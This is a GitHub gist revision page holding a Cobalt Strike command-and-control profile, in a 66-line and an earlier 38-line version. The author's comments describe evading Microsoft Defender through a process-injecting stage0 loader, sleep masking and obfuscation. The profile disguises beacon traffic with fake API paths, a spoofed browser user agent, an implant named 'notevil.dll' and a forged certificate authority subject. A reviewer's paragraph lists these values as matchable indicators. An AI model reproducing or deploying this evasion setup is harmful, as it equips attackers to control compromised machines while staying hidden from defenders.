tothi revised this gist
Dec 26, 2021 . 2 changed files with 66 additions and 38 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,66 @@ # in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures) # as stage0, remote injecting a thread into a suspended process works set host_stage "false"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"; set sleeptime "10000"; stage { set allocator "MapViewOfFile"; set name "notevil.dll"; set obfuscate "true"; set sleep_mask "true"; # if omitted, Defender catches the 1st connect back as Behavior:Win32/CobaltStrike.[EH]!sms } http-get { set uri "/apiv8/getStatus"; client { header "X-Client" "notevil"; # for nginx redirector metadata { base64; header "Cookie"; } } server { output { print; } } } http-post { set uri "/apiv8/updateConfig"; client { header "X-Client" "notevil"; # for nginx redirector id { base64url; parameter "key"; } output { print; } } server { output { print; } } } https-certificate { set C "US"; set CN "update.secureapp9.com"; set O "netsecurity"; set OU "Certificate Authority"; set validity "365"; } This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,38 +0,0 @@ -
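Review bot: The header comments describe what each setting is meant to avoid, but nothing records which values in this profile are fixed, network-visible indicators: the URIs `/apiv8/getStatus` and `/apiv8/updateConfig`, the `X-Client: notevil` header, the pinned Chrome/Edge 96 user agent string, and the self-signed certificate subject `CN=update.secureapp9.com, O=netsecurity, OU=Certificate Authority` are all static and can be matched directly against proxy and TLS logs by anyone who obtains this gist. Suggest a comment at the top of the file, e.g. `# NOTE: the URIs, X-Client header, user agent and https-certificate subject below are static values; treat them as indicators of this profile`. The same point applies to the original 38-line revision further down, which already carries the two URIs, the `Cookie` metadata channel and the `key` parameter.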
tothi created this gist
Dec 26, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,38 @@ http-get { set uri "/apiv8/getStatus"; client { metadata { base64; header "Cookie"; } } server { output { print; } } } http-post { set uri "/apiv8/updateConfig"; client { id { base64url; parameter "key"; } output { print; } } server { output { print; } } }